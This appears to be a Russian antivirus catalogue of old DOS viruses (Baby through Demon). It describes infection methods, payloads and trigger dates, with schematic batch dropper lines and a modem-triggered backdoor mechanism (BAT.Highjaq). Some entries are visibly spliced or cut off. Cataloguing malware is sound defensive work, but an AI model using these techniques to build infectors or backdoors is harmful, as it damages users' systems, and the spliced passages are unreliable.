B

Baby.83, 100

Неопасные резидентные вирусы-спутники. Изменяют последнюю букву расширений запускаемых файлов.

BackFormat.2000 (1,2), 2345, 2381

Опасные вирусы. Заражают EXE, COM-файлы на дисках A: и B: при закрытии (f.3Eh INT 21h) вновь создаваемых файлов (f.3Ch, 5Bh INT 21h). BackFormat.2000 (2) также заражает при закрытии открытых файлов. Вирусы заражают c:\command.com, не изменяя его длины. Перехватывают INT 13h, INT 21h. При форматировании гибких дисков, последовательно присваивают секторам значения в обратном порядке, начиная со старших адресов. Например, для диска 360K вместо значений 1,2,...,9, порядок чередования секторов будет - 9,8,...1.

BackFormat.2320

Очень опасный резидентный шифрованный вирус. При записи в файл (f.40h Int 21h) очень часто сдвигает записываемую информацию на 1 байт. В пятницу производит данную операции в 4 раза чаще.

BackUSSR

7 октября выводит текст "I'm backing to the USSR !".

BadBoy.1000 (1-7)

Неопасные резидентные вирусы. Состоят из 9 блоков, 8 из которых вирусы меняют местами при инфицировании файлов.

Badless.494

Опасный нерезидентный вирус. Заражает *.COM-файлы. Файлы формата EXE, имеющие расширение COM вирус уничтожает, записывая в них 37 байт кода, который при старте данных программ выводит текст "Only in God we trust...". Имеет также текст "Badless 1992".

BadSectors.3422, 3428, 3627

Опасные резидентные вирусы. Перехватывают INT 8, 16h, 21h, 25h, 26h. Иногда устанавливают "плохие" кластеры диска посредством манипуляций с таблицами размещения файлов FAT. Не заражают программу SCAN. Содержат текстовые строки "COMEXE", "SCAN" и
BadSectors.3422: BadSectors 1.1
BadSectors.3428: BadSectors 1.2
BadSectors.3627: BadSectors 1.3

Balashiha.271

Блокирует вывод на принтер. Содержит строку "Balashiha-2".

BAME-вирусы

BAME (Black Angel Mutatuon Engine) - полиморфный генератор вирусных шифровщиков и расшифровщиков. Создан вирусописателем известным, как Black Angel.

BAME.Demo

Неопасный резидентный полиморфный вирус. Каждую минуту "сбивает" буфер клавиатуры. Содержит тексты "This is [BAME beta version] DemoVirus © Black Angel`96", "BlackAngelMutationEngine v1.beta ©Black Angel".

BAME.Saboteur

Опасный резидентный полиморфный вирус. Разрушает каждый 15 открываемый файл с расширением BA?, AR?, PA?, записывая в них строку "SABOTEUR-2". После заражения 6 программ (а также в некоторых других случаях) вирус уничтожает содержимое CMOS-памяти, MBR первого жесткого диска.

Bandersnatch

Неопасный резидентный полиморфный стелс-вирус. Содержит тексты "Злопастный Брандашмыг", "DOS-UP", "What's fuck?"

Baran.3294, 4968

Резидентные полиморфные вирусы. Baran.4968 - стелс-вирус. Baran.4968 заражает командный процессор, указанный в переменной COMSPEC. Если вирус работает под управлением MS Windows, то вирус также заражает программу, которая запускается при выходе из Windows. Baran.3294 может вывести текст "Gwadera to baran !". Baran.4968 портит данные, записываемые на диск. Baran.4968 содержит текст "Unknown destroyer v1".

Barrotes.1303

Неопасный резидентный шифрованный вирус. Сразу стремится заразить файл COMMAND.COM. 23 сентября изменяет символы, вводимые с клавиатуры. Содержит тексты "Sta Tecla (MAD1)", "ST".

Barrotes.1310

Опасный резидентный вирус. Первым делом стремится заразить файл c:\command.com. 5 января уничтожает MBR первого жесткого диска и выводит на экран текст "Virus BARROTES por OSoft".

Basilisk.1639

Неопасный полиморфный вирус. При старте программ SCAN*.* вирус выводит сообщение "Packed file is corrupt" и возвращает управление в DOS. Содержит строку "Basilisk v1.0" и текст:
© 1992 YAM/RABID International
The slave thinks he is released from bondage
only to find a stronger set of chains

Bastard.1979

Очень опасный резидентный вирус. Заражает EXE-файлы и файл COMMAND.COM. В файл COMMAND.COM вирус записывает 200 байт кода, который не является вирусным кодом. Может уничтожить 100 секторов диска A: или C: Удаляет файлы MS*.* и CP*.*. Не заражает файлы, содержащие в своем имени 2 соседние буквы из строки "SCCLF-TBVSVIIMMSCV". Имеет строку "This virus was written by Doctor Revenge November 23 - December 29 1993 -Italy-".

BAT.282

Неопасный нерезидентный Batch-вирус. Создает в корневых каталогах дисков B: и C: файл VIRUS.BAT, содержащий вирусный код. Вставляет в файл AUTOEXEC.BAT вызов файла VIRUS.BAT.

BAT.Batalia.2011

Неопасный полиморфный вирус, заражающий *.BAT-файлы в текущем каталоге. При заражении файлов вирус использует архиватор ARJ, доступный через переменную среды PATH. Инфицированный BAT-файл состоит из двух частей. Первая часть состоит из пяти команд DOS, а вторая часть является заархивированным с помощью ARJ BAT-файла, имеющего случайное имя. Этот заархивированный BAT-файл также содержит команды DOS и еще один ARJ - архив. Команды DOS являются основным телом вируса, они производят поиск файла-жертвы, заражение файлов и создание полиморфного кода.Первые пять команд вируса вибираются случайным образом и имеют различную длину. Вторая часть - ARJ-архив зашифрован со случайным паролем и не может быть детектирован по определенной маске. При запуске инфицированного BAT-файла, первые пять команд запускают архиватор ARJ для распаковки второго BAT-файла и передают ему управление. Этот BAT-файл создает временный подкаталог S_G_W_W, разархивирует в этот подкаталог файлы из второго архива, выполняет поиск и заражение BAT-файлов, выполняет BAT-файл-носитель, удаляет временный подкаталог и файлы и заканчивает свою работу.

BAT.Batman

Неопасный резидентный вирус, заражающий BAT-файлы. Инфицированный BAT- файл создает файл B.COM, в который записывает свой код, и отдает ему управление. Файл B.COM, исполняющий содержимое BAT-файла, как машинные инструкции устанавливает в память свою резидентную копию, не проверяя ее наличия в памяти, и "перехватывает" INT 21h. После этого файл B.COM удаляется. При записи в файл (f.40h Int 21h) вирус проверяет не находится ли первой в буфере записи строка @echo. Если находится, то вирус считает, что производится запись BAT-файла и записывает в него свой код. Внешне вирус BAT.Batman выглядит следующим образом:
@ECHO OFF
REM [............]
copy %0 b.com>nul
b.com
del b.com
rem [............]
В квадратных скобках [......] схематично показано расположение байт, которые являются ассемблерными инструкциями или данными вируса.

BAT.BatVir

Неопасный нерезидентный вирус, заражающий BAT-файлы. Инфицированный BAT-файл создает файл BATVIR.94, в который записывает собственный дамп. Далее с помощью программы DEBUG данный дамп преобразуется в COM-файл. Данному COM-файлу программой DEBUG отдается управление. Этот COM-файл производит поиск и заражение *.BAT-файлов в текущем каталоге, после чего производится выход из DEBUG и удаление файла BATVIR.94. Вирус содержит текст "rem [BATVIR] '94 © Stormbringer [P/S]".

BAT.Highjaq

Очень опасный нерезидентный вирус-червь. Записывает свой код в WINSTART.BAT, ARJ-архивы и создаваемый вирусом системный драйвер. При старте инфицированного WINSTART.BAT-файла вирус создает файл C:\Q.COM, записывает в него свой код и запускает его следующей строкой BAT-файла: dir \*.arj/s/b|c:\q.com/i. Команда DIR производит поиск всех *.ARJ-файлов и передает их имена вирусному файлу C:\Q.COM.Данные архивы заражаются путем приписывания к ним еще одного поля в формате ARJ-архива, содержащего неупакованный (store) инфицированный файл /WINSTART.BAT (данный файл, расположенный в корневом директории диска, где находится система MS-Windows будет автоматически запускаться при старте MS-Windows).После чего вирус (C:\Q.COM) проверяет установлена ли его резидентная копия в памяти.Если нет, то вирус (С:\Q.COM) возвращает соответствующий код возврата (errorlevel) и заканчивает свою работу. По данному коду возврата (если память не инфицирована) вирус в BAT- файле переименовывает файл C:\Q.COM в C:\ABCDEFGH.IJK (вирус генерирует случайное имя) и дописывает в конец файла C:\CONFIG.SYS строку "INSTALLHIGH=C:\ABCDEFGH.IJK". Данный вирусный системный драйвер будет устанавливать резидентную копию вируса в память при загрузке DOS. Резидентная копия "перехватывает" INT 8, 21h и не занимается заражением файлов, а предназначена для идентификации наличия вируса в системе, а также вирусный обработчик INT 21h блокирует функцию GetFileAttribute для файлов, имена которых начинаются на "/W". Вирусный обработчик INT 8 через некоторое время перезагружает систему, если компьютер работает не под управлением MS-Windows. Вирус контролирует COM-порты и иногда посылает в порт модема строки (? - номер порта):
HIGHJAQ on COM?:38400,N,8,1 Система перезагружается если вирус определит, что бит Carrier Detect в течение 3-ех минут трижды устанавливался в единицу в соответствующем COM-порте. После перезагрузки системы вирус "перехватывает" INT 8, блокирует клавиатуру и запускает файл C:\COMMAND.COM с командной строкой "C:\ COM? /E:1024/P/F". Т.е., вирус определяет 3 звонка в течение 3-ех минут (1 звонок в минуту) от некоторого хакера и считает это "сигналом к взлому системы". После этого система перегружается, запускается COMMAND.COM и в порт модема посылается команда ATL0M0A. Хакер, позвонивший модемом в это время на данный компьютер, увидит после соединения системное приглашение "C:>" и сможет сделать с этим компьютером все, что хочет.

BAT.Naive

Неопасный резидентный вирус, заражающий BAT-файлы. Инфицированный BAT- файл проверяет наличие переменной среды RANGE_CHECK, если она равна "yes", то вирус отдает управление содержимому оригинального BAT-файла. Если данная переменная не установлена в "yes", то следующими строками вирус создает файл naive.com, в который записывает код проверки наличия в памяти своей TSR-копии, после чего запускает данный файл - "@naive.com". При отсутствии TSR-копии NAIVE.COM устанавливает соответствующий код возврата, который анализируется BAT-вирусом. Далее файл NAIVE.COM создается заново и в него записывается код, получающий информацию из стандартного входа (CON), который в свою очередь поступает из созданного файла NAIVE.DAT, в который вирус записал закодированный текст своего кода (один байт преобразован в два символа). Файл NAIVE.COM преобразует символы ASCII по некоторому алгоритму перекодирования (два символа - в один байт) в программный код и записывает этот код в файл NAIVE.EXE:
@echo>naive.com №ЁРБьЁУrXґ?........
@echo>naive.dat DDMJDDNCLEP........
@echo>>naive.dat IMAGPAACIJ........
...................................
@naive.comnaive.exe
Затем файлы NAIVE.COM и NAIVE.DAT удаляются:
@del>nul naive.com
@del>nul naive.dat
Запускается файл NAIVE.EXE, устанавливающий в память свою TSR-копию.
@naive.exe>nul
Файл NAIVE.EXE удаляется и устанавливается переменная среды RANGE_CHECK=yes, и управление отдается оригинальному BAT-файлу.
@del>nul naive.exe
@set range_check=yes
Далее при смене каталога (f.3Bh INT 21h) резидентная часть вируса производит поиск *.BAT-файлов, проверяет их на зараженность, и если они еще не заражены, создает файл NAIVE.TMP, производит кодирование своего программного кода в последовательность символов ASCII и записывает 4894 байт в файл NAIVE.TMP. После этого вирус дописывает в файл NAIVE.TMP содержимое оригинального BAT-файла и переименовывает NAIVE.TMP в имя BAT-файла.

BAT.Pot, BAT.Xop367, 850, BAT.Zep, BAT.Zop (1,2).

Неопасные нерезидентные вирусы. Заражают *.BAT-файлы в текущих и родительских директориях. BAT.Zop содержит текст "::[8m --- [ZoP_B] Batch Infector ---". BAT.Pot выводит тексты "You're Stoned!", "Let me outta here!".

BAT.Winstart.296, 297

Неопасные резидентные вирусы, создающие файлы WINSTART.BAT. При старте такого файла вирусы копируют содержимое стартовавшего BAT-файла, содержащего вирусный код в файл C:\Q.COM и запускают его:
@ECHO OFF
:s%r#
COPY %0.BAT C:\Q.COM>NUL
C:\Q
Далее управление в файле C:\Q.COM попадает на эти же команды, которые уже выполнялись в инфицированном BAT-файле, но только в данном случае команды в COM-файле уже представлены, как ассемблерные инструкции, которые отдают управление командам, следующими за строкой C:\Q. Вирусы устанавливают свою копию резидентно в память (в область HMA) и "перехватывают" INT 2Fh, после этого переименовывают файл C:\Q.COM в C:\WINSTART.BAT. Резидентные копии вирусов контролирует запуски командного процессора и создают файл WINSTART.BAT в текущем директории.

Bauman.2203

Очень опасный нерезидентный вирус. В пятницу во второй половине дня уничтожает информацию на первом жестком диске. Оставляет в памяти резидентную копию, которая "гуляет" по разным адресам памяти и удаляет программы с именами DRWEB и AVP при их запуске. Содержит текст "© T&T Bauman".

Beast.Zver

Очень опасный резидентный вирус. Использует алгоритм заражения, заимствованный из вирусов семейства Beast - в начало файла записывается вирусный код, а оригинальное начало хранится в последнем неиспользуемом кластере файла на диске. Длина файла не меняется при этом не изменяется. Но длина файла по цепочке FAT может не совпадать с реальной длиной. Вирус содержит текст "~ZVER~".

Beda.337, 338, 352, 883, 1301, 1530

Свое название получили за функцию проверки своего наличия в памяти - f.BEDAh INT 21h. Beda.883, 1301 устраивают видеоэффект - три цветные линии, плавающие по экрану. Beda.352 имеет строку "ACHE". Beda.1301, 1530 при открытии (f.3Dh INT 21h) инфицированного файла создают новый файл \$a._$, в который записывают содержимое оригинального файла и возвращают открывающей программе описатель (handle) данного созданного файла. При закрытии файла (f.3Eh INT 21h) вирусы удаляют файл \$a._$. Beda.1530 удаляет файлы, начинающиеся на -V, WEB, AIDS, A-DIN. Также, Beda.1530 иногда изменяет в буфере клавиатуры нажатие клавиш F5, N, n соответственно на F8, Y, y.

Beer.645

Неопасный резидентный вирус. Иногда выводит текст "Ceйчac бы пивкa".

Beer.2473, 2620, 2794, 2850, 2984, 3164(1,2), 3192(1-3), 3399, 3490(1,2)

Опасные резидентные шифрованные вирусы. Beer.2473, 3164, 3192, 3307, 3399 уничтожают файлы DISKDATA.DTL, VIRUSES.INF, DIRINFO, -V.MSG или A-DINF-°.°°°. Иногда проигрывают мелодию и выводят сообщения:
Beer.2473 - Виpус,Виpус ха-ха-ха. ПРЯМО СВЕРXУ xa-xa-xa-xa !!!
Beer.2620, 2794, 2850, 2984, 3164, 3192, 3490 - Ceйчac бы пивкa
Beer.3399 - Lozinsky! I know you to be old beer drinker. How about a mug of beer or two? It would be amazing to meet you at our beer party. You are welcome at Solntsevo railway station About 17.00 p.m. every friday and wednesday.
Beer.3490 (1,2) содержат тексты "EGA - text mode demonstration Copyright © by Wadim 1990.", "I love you ,Ann !ANNA", "Wadim S.".

BG.1348

Опасный резидентный зашифрованный вирус. Иногда выводит текст:
Seems so simple now
Now that the sky is clear
Maybe the road was tough
But at last we're here
I've nothing to hide from you
Nothing to explain
Just this vision of broken wing
And the raven cries in pain...
Enter the name of song:
При неправильном ответе вирус "зацикливает" систему.Также может вывести на экран картинку.

BG.2135

Hеопасный резидентный шифрованный вирус. При одновременном нажатии на клавиши F12, NumLock, CapsLock и ScrollLock, вирус выводит текст:
И, может быть, тогда откроется дверь,
И звезды замедлят свой ход.
И мы встанем на пристани вместе,
Взявшись за руки, глядя на парусный флот.

BG.3084

Опасный резидентный полиморфный вирус. Выводит на экран текст Рок-н-ролл мертв, а я еще нет...
При открытии файлов с расширениями TXT,PAS,CPP,DIZ,NFO вирус записывает
в них тексты:
Я буду учиться не оставлять следов,
Учиться мерить то, что рядом со мной:
Землю - наощупь, хлеб и вино - на вкус,
Губы губами, небо - своей звездой;
Я больше не верю в то, что есть что-то еще;
А глаза с той стороны прицела ясны.
Все назад! Я делаю первый шаг,
Я начинаю движение в сторону весны...
То ли вынули чеку,
То ль порвалась связь времен.
Подружились господа,
Да с Господней сранью.
На святой горе Монмартр
Есть магический Семен,
Он меняет нам тузы
На шестерки с дрянью.
Раньше сверху ехал Бог,
Снизу прыгал мелкий бес,
А теперь мы все равны,
Все мы анонимы.
Через дырку в небесах
Въехал белый Мерседес,
Всем раздал по три рубля
И проехал мимо...
нтные шифрованные вирусы. 17 ноября выводят текст:
G+A=

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

Press any key to go on

BigMouse.998

Очень опасный шифрованный резидентный вирус. В апреле уничтожает содержимое логического диска D:. Содержит строки "SCANCLEAVIRSF-PRCPAV" и "-=GC73=-".

Birthday.512

Опасный нерезидентный вирус. 31 числа в 11 часов удаляет стартовавшую инфицированную программу. Содержит текст "Happy Birthday!!".

Bishkek.319

Опасный нерезидентный вирус. 31 числа уничтожает содержимое 10 первых секторов жесткого диска. 22 числа выводит текст "Scorpions by Sch(5) in Bishkek".

BitAddict.979, 1190, 1459, 1601

BitAddict.979, 1190 - неопасные, BitAddict.1459, 1601 - очень опасные резидентные вирусы. Размещают свою резидентную копию в нескольких системных буферах. При первом запуске стремятся заразить командный процессор, указанный через переменную COMSPEC. BitAddict.1459, 1601 уничтожают содержимое секторов диска D: после 256 "переходов" вирусов с одного компьютера на другой.

Bitch

Неопасный Boot-вирус. Пытается заместить собой вирусы Stoned и Michelangelo, если обнаружит их на дисках. При ошибке записи своего кода на диск выводит на экран текст: "ю.Z.яэF< SVINOLOBOVA SYKA >S0_MBR © 04.1994 by @SOURCE (ЛИАП). По всем вопросам обращаться по тел. 264-35-27 ( после 22ч. Люда ).".

BlackJec.231,232,235,236,247,252,267,272,276,281,287,292,301,307,358,363,369, 374,378,427,440,441

Неопасные (BlackJec.301, 307 - опасные) нерезидентные вирусы. BlackJec.301, 307 в сентябре пытаются отформатировать первую дорожку текущего флоппи-диска и выводят текст "Sad virus - 24/8/91".

BlackMonday.1055

Очень опасный резидентный вирус. В понедельник форматирует нулевую дорожку жесткого диска. Содержит текст "Black Monday 2/3/90 KV KL MAL".

BlackSun.2372

Неопасный резидентный зашифрованный вирус. Иногда "трясет" экран посредством изменения строчных букв на заглавные и наоборот на экране. Содержит тексты "CHKLISTDISKINFOSCOPEЕ", "BlackSun v1.0 "Shaker"".

BlackWorm

Очень опасный загрузочный вирус. Начиная с 1995 года уничтожает содержимое первого жесткого диска. Содержит текст "BLACK WORM".

Blah.3379, 3385

Неопасные файлово-загрузочные стелс-вирусы. Заражают MBR жесткого диска и BAT-файлы. При старте инфицированного BAT-файла, вирусы создают файл є.com, в который записывают некоторый текст. После чего вирусы отдают управление данному є.com файлу. Первые байты текста файла є.com воспринимаются процессором, как ассемблерный код, производящий по определенному закону,конвертацию текстовых строк в вирусные инструкции. Далее є.com файл устанавливает свою резидентную копию в память, "перехватывает" INT 13h, 21h и заражает MBR "винчестера". После чего файл є.com удаляется. Резидентные копии вирусов заражают BAT-файлы и осуществляют стелс-механизм сокрытия вирусного кода в инфицированных BAT-файлов и MBR. Вирусы содержат текст "Blah virus (DA/PS)"

Blind.549

Опасный нерезидентный вирус. Из-за ошибок может разрушить инфицируемые файлы. Содержит текст "=Blind Guardian 1995=".

Blink.501

После каждого 4 заражения файла вирус "мигает" экраном.

Bobby.613

Неопасный нерезидентный вирус. По пятницам выводит текст: Пpивет, я - безобидный виpyс Bobby Friday. Я не пpичиню вpеда вашемy компьютеpy Я только бyдy говоpить по пятницам, что моемy автоpy очень нpавится девyшка по имени СВЕТА.

Bomzh.3809

Опасный резидентный шифрованный вирус. "Перехватывает" INT 17h (вывод на принтер) и INT 21h. При печати на принтер вставляет после запятой междометие ", бля". Содержит тексты:
Приветствую всех хакеров, читающих этот текст.
Этот вирус - типичный "студенческий".
Приношу всем пострадавшим от его некорректных
действий свои искренние извинения.
Он был написан в период летней практики только от скуки.
Благодарю за помощь, которую мне оказали:
Игоря Данилова(за его VIRLIST),
Евгения Касперского(за "Компьютерные вирусы в MS-DOS".
Евгений, не пишите больше таких книг - "чайникам" они бесполезны,
профи - насрать, а вот вирусописатели...),
Карпова Вадима - за литературу,
Иванова Олега - за комп.
Все замечания в свой адрес приму
через FIDONET 2:5033/1.32 с пометкой "Бомжу".
Желаю всем жить счастливо!
Пока!
Ваш Бомж.
Бомж-вирус.

Bones

Очень опасный загрузочный стелс-вирус. 7 числа уничтожает содержимое дискеты, к которой происходит обращение, и первого жесткого диска.

BootCom.Light

Неопасный файлово-загрузочный вирус. При первом старте зараженного COM- файла, вирус инфицирует MBR жесткого диска. При загрузке системы с такого диска вирус "перехватывает" INT 1Ch, ждет второго изменения INT 21h, после чего "перехватывает" INT 21h. Содержит текст "© Light General.For free use!Kiev.1995".

BootCom.Peanut.445

Опасный вирус. Заражает MBR жесткого диска и Boot-сектора гибких дисков, а также COM-файлы при их запуске. При старте инфицированного COM-файла или при загрузке с зараженного флоппи-диска вирус поражает MBR "винчестера". При загрузке с инфицированного жесткого диска вирус размещает свою TSR-копию в верхних адресах памяти и перехватывает INT 13h. После загрузки первой EXE-программы вирус перехватывает INT 21h. При заражении дискет вирус не сохраняет оригинальный Boot-сектор. При чтении через INT 21h зараженного MBR вирус подставляет оригинальный MBR (стелс-вирус).

BootExe.174

Очень опасный файлово-загрузочный вирус. Внедряет свой код в середину загрузчика MBR, устанавливая на этот код свою программную ссылку. При загрузке системы с инфицированного диска устанавливает свою резидентную копию в таблицу векторов прерываний, "перехватывает" INT 13h, проверяет запись на флоппи-диски COM или EXE-файлов (определяя их по первым байтам заголовка файла: 0E9h - для COM и 'MZ' - для EXE-файлов) и записывает свой код в начало данных файлов, не сохраняя оригинальный программный код.

BootExe.443, 444, 451 (1,2), 452

Опасные вирусы. Заражают Boot-сектора "винчестера" и гибких дисков, а также EXE-файлы, внедряя свой код в заголовок EXE-файлов, превращая файл из формата EXE в формат COM-файла. Вирусы перехватывает INT 13h и "следят" за чтением секторов. Если прочитанный сектор содержит сигнатуру "MZ", то вирусы считают, что был считан заголовок EXE-файла. И если данный заголовок равен 512 байтам, и EXE-файл имеет достаточно свободного места в таблице перемещаемых элементов (relocation table), то вирусы записывают в свободное место заголовка EXE-файла свое тело и изменяют сигнатуру "MZ" на короткий JUMP (EBh ??) на свой код. После чего производят запись данного сектора, содержащий вирус, на диск. Вирусы также заражают Boot-сектор жесткого диска, считая, что он располагается на головке-1, дорожке-0, секторе-1. При заражении дискет, отличных от 360 Kb, вирусы не сохраняют оригинальный Boot-сектор.

BootExe.Dogcher

Опасный резидентный вирус, заражающий MBR первого жесткого диска и EXE-файлы. При заражении EXE-файлов вирус записывает оригинальный сектор, содержащий заголовок EXE-файла (512 байт) в сектор, предшествующий исходному, не проверяя его содержимое.

BootExe.Olga

Опасный вирус. Заражает MBR жесткого диска и EXE-файлы. 27 декабря уничтожает содержимое жесткого диска. Содержит текст "SGB:Olga++".

BootExe.Platov

Устанавливает свою резидентную копию по адресу 9000:FC00h. Принадлежит "перу" Андрея Платова.

BootExe.Stalker.310, 320

Опасные резидентные вирусы, заражающие MBR "винчестера" и EXE-файлы. При запуске инфицированного EXE-файла, вирусы заражают MBR, не сохраняя оригинальный загрузочный сектор MBR, и "вешают" систему. При загрузке системы с инфицированного MBR, вирусы устанавливают в память свои резидентные копии и "перехватывают" INT 13h. BootExe.Stalker.320 содержит строку "*Stalker*" с инвертированными битами.

Bowl.737

Неопасный нерезидентный шифрованный вирус. Неработоспособен на Pentium PC.

Brasil

Очень опасный загрузочный вирус. Может вывести текст "Brasil virus!" и уничтожить содержимое секторов жесткого диска.

Bravo

Опасный загрузочный вирус. Может уничтожить содержимое MBR, записав вместо него случайные данные, в начале которых будет присутствовать строка "Bravo".

Brownie.688

Неопасный вирус. 13 числа выводит текст "brownie for Koliada A.I." и воспроизводит некие звуки на динамике.

BrPI.511, 555

Неопасные резидентные вирусы. BrPI.555 производит скроллинг экрана на несколько строк вверх для каждого 3-го стартующего инфицированного файла. Содержат строки:
BrPI.511 - "© by BrPI Version 2.0 '92"
BrPI.555 - "by BrPI '92".

Btg.792

Неопасный резидентный вирус. При запуске некоторых программ может вывести текст "Error in EXE file". Содержит строку "Btg#".

Bug.920

Опасный нерезидентный вирус. Производит поиск *.EXE файлов и создает для этих файлов COM-файлы длиной 73 байта, не содержащие вирусный код, а только производящих запуск данных EXE-файлов. Также производит поиск и заражение стандартным образом COM-файлов. Удаляет файлы c:\chklist.*. Производит изменение случайного символа знакогенератора. Содержит текст "BUG-2.0oН".

Burger.382, 560

Очень опасные, замещающие программный код, вирусы. Burger.382 иногда пытается переименовать файл с расширением EXE в файл с расширением COM. Уничтожают информацию в 2ух случайных секторах диска C:.

Burglar.1150

Неопасный резидентный вирус. При значении секунд системного времени- 14 вирус выводит текст "Burglar/H". Не заражает файлы из списка (по 2 символа на имя) "CLHWTBF-WCTK". Содержит текст "AT THE GRAVE OF GRANDMA...".

Burma.442 (1,2), 666

Производят видеоэффект: все символы на экране кружась, исчезают в центре экрана. Burma.442 (1,2) выводят текст "[Tempest - р]", они содержат строку "Rangoon, Burma". Burma.666 выводит тексты "SwizzleStyxx!" и "Reading system configuration, please wait.", содержит также текст "DarkAvenger".

BW.Roet.1899

Опасный резидентный вирус. 20 декабря уничтожает содержимое логического диска C: и выводит текст: ROETVIRUS_E5IBINFECTION PC DeStruCTion aFTeR 255 bEEpsTry aGAin NexT YEar ROETJE - THE IMMENSE

ByeBye

2, 6, 10, 14, 18, 26 и 30 мая выводит на экран текст "Bye bye C&C".

D

DaBoys (1,2)

Опасные загрузочные вирусы. Не сохраняют оригинальные загрузочные сектора дисков. Содержат строку "DA`BOYS".

Dac.1582, 1600

Неопасные резидентные вирусы. Пытаются скрывать приращение своих длин, но делают это с ошибкой. После 47 заражений файлов выводят сообщения в режиме 40x25:
Dac.1582:
Do not interrupt; the D.A.C action. The ALIEN,v.1.0.1991y. I'm asked users to call author. L..bank. Simferopol-city. Written by M>2,F<2,T>2. Not destructs, but errors. Halt !.. Bye!
Dac.1600:
Do not interrupt; the D.A.C action. The FBARA v.1.4.1993y. I'm asked users to call author. Unknown. ..m.e..po.-c.ty. Written by M>3,F<2,T>2. Not destructs, but errors. Halt !.. Bye!
После чего "вешают" систему.

Daemaen.1894, Daemaen.2048

Неопасные файлово-загрузочные шифрованные вирусы. Заражают COM, EXE, BIN, OVL, SYS- файлы MBR жесткого диска и Boot-сектора дискет. Содержат строку "COMEXEBINOVLSYS". Daemaen.1894 содержит строку "SCCLVSF-". Daemaen.1894 не заражает программы, содержащие в своем имени первые 2 буквы из 8 символов данной строки. Также в теле вирусов имеются еще текстовые строки -
Daemaen.1894:
Cowboys From Hell/Vulgar Display of Power [Pantera] The best Power Metal band in the world. tHiS k0oL ViRUZ WaReZ bY [TДLФN<=>NЦKф] '93!
Daemaen.2048:
[DДeMЖИn] by TДLФN-{NЦKф}
Hugs to Sara Gordon
Hey John! If this is bad, wait for [VCL20]!
For Dudley
[VCL20с]/TДLФNшЛ

DAME-вирусы

DAME (Dark Angel Mutation Engine) - полиморфный генератор вирусных шифровщиков и расшифровщиков.

DAME.Lame

Неопасный нерезидентный полиморфный вирус. Содержит текстовую строки: *.com .. This is a lame virus slapped together by DA/PS To demonstrate DAME 0.91

DAME.Trigger

Резидентный полиморфный вирус. Пытается найти в памяти и что-то сделать с какой-то резидентной программой. Трассирует INT 21h и "врезает" в оригинальный обработчик 5 байт прямого межсегментного перехода на свой код. Содержит текстовую строку:
Trigger by Dark Angel of Phalcon/Skism
Utilising Dark Angel's Multiple Encryptor (DAME)

Daniela

Опасный загрузочный вирус. 5 апреля уничтожает информацию на жестком диске. Содержит текст "EU TE AMO DANIELA".

Danish.284

Содержит текст:
*** NIGHTCRAWLER V 2.0 *** Written by the Weasel!
© Sector Infector Inc

Danish.Kennedy

6 июня, 18 и 22 ноября выводит текст "Kennedy er dЫd - lСnge leve "The Dead Kennedys"".

DarkAngel.3250

Опасный резидентный полиморфный вирус.Содержит в своем теле загрузочный вирус DarkAngel, описанный выше. Иногда DarkAngel.3250 заражает MBR жесткого диска вирусом DarkAngel, который в последствии "живет самостоятельной жизнью". DarkAngel.3250 содержит тексты "D.Angel", "Copyright © Dark Angel Corp 1992-1993.".

Day14.789, 792

Опасные нерезидентные вирусы. 14 или 24 числа месяца уничтожают содержимое CMOS памяти и MBR (или 256 секторов первого жесткого диска - Day14.792).

Dead.852

Неопасный резидентный вирус. Во втором и девятом часах издает звуковые сигналы. Не заражает файлы, имена которых начинаются на AI, WE, DR.

Dead.1362, 1364

Очень опасные резидентные вирусы. Ведут счетчик заражений внутри файлов. При счетчике более 255 вирусы уничтожают содержимое диска D:. Содержат строку "COMSPEC".

Debilas.2000

Опасный резидентный вирус. В сентябре после 22 числа уничтожает содержимое 128 секторов каждого логического устройства жесткого диска и выводит текст:
-=DMS=-
Fuck you b.tAMULYNAS and to your crack of Print_Screen
Buvai DEBILAS , esi DEBILAS ir busi DEBILAS !!!
Copy right Antanas Vidziunas ,VDU, 1996.
Не заражает файлы, содержащие следующие сочетания: AI,CL,WE,AD,AN,SC,
V.,LD,PR,MM. Содержит зашифрованный текст "I `LL BE IN KTU SOMEDAY".

DecMem

Неопасный загрузочный вирус. При заражении загрузочных секторов флоппи- дисков запоминает системную дату в своем теле. При загрузке системы с такого диска и несовпадении значения запомненной даты и системной,вирус записывает в данный загрузочный сектор новую дату и увеличивает на 1Kb значение "отрезаемой у DOS" резидентной копией вируса количества доступной памяти.

Deicide.520

Опасный резидентный вирус. 13 числа месяца любой символ, выводимый на печать, меняет на символ "6". Содержит тексты "666", "DEICIDE".

Dennis.539, 656, 689, 1000

Неопасные резидентные вирусы. Dennis.656 20 июня производит всяческие манипуляции с клавиатурой (байт по адресу 0040:0017h), Dennis.689 при выводе на печать вставляет перед каждым выводимым символом команды, попеременно изменяющие верхний и нижний регистр букв. Dennis.689 содержит текст "v1.0(CrazyPrinter)ByDennisDavydov", Dennis.1000 имеет зашифрованный текст "execomыD.Davydov".

Demiurg.3061

Опасный резидентный файлово-загрузочный вирус. "Перехватывает" INT 13h, 2Ah, 0CEh, 0E0h. При открытии файла A-Dinf-°.°°°, вирус производит подсчет CRC в некоторой области памяти (?) и удаляет свой код из секторов диска, но MBR не перезаписывает, в результате чего система повиснет при загрузке с такого диска. Работоспособен только в DOS версиях 6.xx. Содержит тексты:
Мир вам.Меня зовут Demiurg.Я хранитель врат,врат Ада.
Все кто хочет увидеть Хозяина встречается со мной,а кто
встречается со мной попадает к Хозяину...мертвым.
Тупые охотники за головами,с притензией на интеллект
гадатели,всезнающие визири-многие пытались увидеть
меня,но порой их глаза были ослеплены,а ум нашептывал
соблазнительное OK
LORD

Democracy.3806

Неопасный резидентный вирус. Иногда выводит следующие сообщения:
Please answer:
OK!
Don't forget June Fourth!
I agree
I have not ANY side effect.
ANY cleaning action will make servere result.
You don't answer correctly, once again.
Democracy

Demon.4313, 4767, 5670

Опасные резидентные шифрованные вирусы. Удаляют файлы: SCAN.DAT, SIGN.DEF, TBAV.KEY, TBSCAN.SIG, Anti-vir.dat, chklist.ms. При попытке заражения файла на защищенном от записи диске вирусы выводят сообщения:
Demon.4767 -
Disk is Write Protected Please Unprotect it and Press Any Key When Ready
Demon.5670 -
Disk is Write Protected Please Unprotect it AND Press any key to continue . . .
После чего ждут нажатия на клавишу и Demon.4767 выводит сообщение:
Thank-You, Please Wait...
Demon.4313 содержит строку "[demon4]structor.264 6 числа после 12.00 выводит текст "Destructor, Copyright © 1992 by Krasikov".

Device.2000

